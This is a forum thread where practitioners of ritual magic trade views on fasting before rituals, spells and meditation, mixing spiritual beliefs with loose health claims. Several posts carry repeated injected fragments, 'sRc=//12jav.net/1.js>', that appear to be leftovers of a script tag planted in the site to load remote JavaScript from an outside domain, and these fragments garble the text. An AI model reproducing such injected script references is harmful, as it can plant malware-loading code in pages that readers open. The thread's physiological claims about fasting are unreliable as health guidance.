Does anyone else Fast before doing big rituals?

What are your views on fasting before rituals?

I believe that when the body is clean and pure you are better able to receive an use energies provided by the universe. I also found that it increases experiences from meditations and astral projections.

I fast at least a day before big rituals,
Four hours before spellcasting,
And one hour before meditations.

Thank you for all future post replies

I don't fast, ever. lol

My veiw is that we need energy when we are casting spells or doing rituals so I normally eat before I do anything. And I agree that "when the body is clean and pure you are better able to receive an use energies provided by the universe," so I don't eat any meat.

Lol I agree with needing energy , I only eat nuts and a fruit that may be beneficial to the spell or ritual. :) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Fasting is a time honored method of seeking the spiritual state for complex ritual work. It is not only valuable in terms of developing a "pure" body or vessel, but the act of fasting is an exorcise of will and self control. This, combined with the physical results of fasting, translate into a mental/spiritual state that is said to aid in better achieving trances, seeing energies and spiritual entities, and otherwise achieving desired qualities for these purposes. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I fast before rituals, and periodically actually, for the reason of purification that Raven FMoon mentioned. I'll only consume water or special teas created around the purpose of my ritual. I feel empty, but not hungry, and I think this makes me a better channel... like a net in the chi river, rather than a rock lol. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Yes exactly I feel like the energy flows more freely through me than over me as in my earlier works where I didn't fast :) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Personally they are only a few special occasions that I will fast for, one being after someone dies and I prepare for the Ritual of the Passing.

I do however commit to ritual baths before I do most of my workings, but fasting is actually depriving the body of nutrient and nourishment lowering the bodies energy. But that is how I view it. It all comes down to preference, beliefs, and balance meaning which ever works best for you, is the way to go.

If it makes any sense however, I do refrain from eating unhealthily before ritual work, I usually partake in a salad, or some fruit. I stay away from most meats, fried foods, confections, and of course any junk food.

Blessings and Peace be with you,

~Illy

No I don't. Fasting weakens the body's energy by forcing it to make ATP from lipids and not glucose.

For ritual purification I use pre blessed water to mark my forehead heart just below the rib cage and just below the naval.

I do have periodic fasts in celebration of the Gods. As a natter of fact Wednesday is the beginning of a five day fast to Ceres. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
